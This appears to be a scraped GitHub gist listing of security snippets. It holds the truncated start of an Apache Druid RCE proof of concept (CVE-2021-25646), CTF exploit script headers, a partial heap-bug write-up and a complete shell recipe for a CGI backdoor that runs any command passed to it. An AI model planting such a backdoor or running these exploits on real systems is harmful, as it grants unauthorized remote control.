muuk lifa123
💭 I may be slow to respond.
  • china
0xf4n9x / CVE-2021-25646 POC
Created February 2, 2021 15:21
CVE-2021-25646 Apache Druid RCE POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
byt3bl33d3r / encrypt_decrypt.nim
Last active March 23, 2025 23:16
Nim AES256 Encryption/Decryption
#[
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: BSD 3-Clause
AES256-CTR Encryption/Decryption
]#
import nimcrypto
import nimcrypto/sysrand
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue
luker983 / drgns2020_bitflip1.py
Last active April 29, 2021 02:09
Dragon CTF 2020 | Bit Flip 1 Solution
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import subprocess
from Crypto.Util.number import bytes_to_long, long_to_bytes
from Crypto.Cipher import AES
import hashlib
import os
import base64
from gmpy2 import is_prime
luker983 / hitcon2020_tenet.py
Last active April 29, 2021 02:07
Hitcon CTF 2020 | Tenet Solution
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
context.update(arch='amd64')
exe = './server.rb'
host = args.HOST or '52.192.42.215'
port = int(args.PORT or 9427)
Jack-Works / 2018.js
Last active March 1, 2024 02:23
cRAzY eSnEXt (*all* proposals mixed in)
#! Aaaaaaaaaaa this is JS!!!
// https://github.com/tc39/proposal-hashbang
// This file is mixing all new syntaxes in the proposal in one file without considering syntax conflict or correct runtime semantics
// Enjoy!!!
// Created at Nov 23, 2018
for await(const x of (new A // https://github.com/tc39/proposal-pipeline-operator
|> do { // https://github.com/tc39/proposal-do-expressions
case(?) { // https://github.com/tc39/proposal-pattern-matching
when {val}: class {
Cgboal / common-ports.clj
Created November 15, 2020 17:56
Common Ports
#!/usr/bin/bb
(defn comment-line? [line]
(re-find #"^\#" line))
(defn tcp-line? [line]
(re-find #"\/tcp" line))
(defn extract-port [substr]
(-> (str substr)

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

  1. Show Name - Shows you your name
  2. Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter. calloc is used to allocate this chunk. This chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
  3. Read Diary - Lets you pick a page index; the corresponding page's contents are printed back to you (using puts).
  4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi